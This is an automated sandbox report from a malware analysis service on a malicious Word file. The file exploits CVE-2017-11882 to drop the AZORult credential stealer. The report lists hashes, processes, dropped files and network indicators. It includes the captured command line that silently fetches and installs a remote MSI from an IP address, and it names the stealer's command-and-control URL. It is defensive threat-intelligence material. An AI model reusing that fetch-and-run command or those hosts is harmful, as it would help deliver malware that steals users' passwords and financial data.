analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PDA-Woo Choon_Tanker.doc

Full analysis: https://app.any.run/tasks/6dbfafbe-dfd1-4b97-8028-4d7ff26676d4
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Analysis date: November 15, 2018, 08:57:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
exe-to-msi
loader
rat
azorult
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

2B1CAD8F874874748C924B9057DD28C5

SHA1:

D91A0830CC5C808F77541BD01172647CDA2E5B33

SHA256:

92B3D0BE6F0EC8124CEF6F2753285E3E9241EDF0451B1E2FF9E839FE6EB2D3A8

SSDEEP:

768:QmKfcZpEHUqUisx+NLBa6fI0mqEN5mtkezbNqzqO2nTECsi6G7VtkPL9oQ28Vb/W:Q4ZcUisxYtHlZd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3524)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 984)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3892)
    • Connects to CnC server

      • MSI9533.tmp (PID: 3360)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3892)
    • AZORULT was detected

      • MSI9533.tmp (PID: 3360)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3524)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3892)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3892)
    • Creates files in the user directory

      • MSI9533.tmp (PID: 3360)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
    • Dropped object may contain Bitcoin addresses

      • msiexec.exe (PID: 3892)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3524)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3892)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3892)
    • Application was dropped or rewritten from another process

      • MSI9533.tmp (PID: 3360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe #AZORULT msi9533.tmp

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PDA-Woo Choon_Tanker.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3524"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
984cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/44.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2808msiexec.exe /i http://34.244.180.39/44.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3892C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3360"C:\Windows\Installer\MSI9533.tmp"C:\Windows\Installer\MSI9533.tmp
msiexec.exe
User:
admin
Company:
KUMASERSOFT
Integrity Level:
MEDIUM
Description:
Inspecting Stricter Intrductin
Version:
3.5.9.6
Total events
1 603
Read events
905
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
9
Unknown types
5

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR884F.tmp.cvr
MD5:
SHA256:
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFF259157C3FDD4876.TMP
MD5:
SHA256:
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3892msiexec.exeC:\Windows\Installer\MSI90BB.tmpexecutable
MD5:150192B630842F4B3C003DD2E4078AB3
SHA256:96129DF4295036332F75C2E7C40D2AC5E959283CC8CADF6778B8E92443361E89
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8197E4B21BAD7A64AD5E2F3A59BF840A
SHA256:9524CE75C7F5EA8554E2992A028F6D0322234CCB937CB8EB6C21551F9E8FAD64
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\Cookies\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:12D9A89FF0C6F1B4ED667DF4A0968949
SHA256:8A1F9FC7ACAA6AB29D17699E21E1EB4D407F2D0C205CEAA9348A7FCDB62A7F50
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\AJVE8S6V\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3892msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\desktop.iniini
MD5:BA96961F5E22882527919E19DAEA510F
SHA256:DACE5AD59099429D8AED4EE279F1263EFB65D64456931398465A396CF0E79BD7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3360
MSI9533.tmp
POST
103.63.2.245:80
http://slimiyt.us/michytery/index.php
HK
malicious
3892
msiexec.exe
GET
200
34.244.180.39:80
http://34.244.180.39/44.msi
IE
executable
460 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3892
msiexec.exe
34.244.180.39:80
Amazon.com, Inc.
IE
suspicious
3360
MSI9533.tmp
103.63.2.245:80
slimiyt.us
Guochao Group limited
HK
suspicious

DNS requests

Domain
IP
Reputation
slimiyt.us
  • 103.63.2.245
malicious

Threats

PID
Process
Class
Message
3892
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3892
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3892
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3892
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3360
MSI9533.tmp
A Network Trojan was detected
ET TROJAN AZORult Variant.4 Checkin M2
3360
MSI9533.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult client request
3360
MSI9533.tmp
A Network Trojan was detected
MALWARE [PTsecurity] AZORult HTTP Header
3 ETPRO signatures available at the full report
No debug info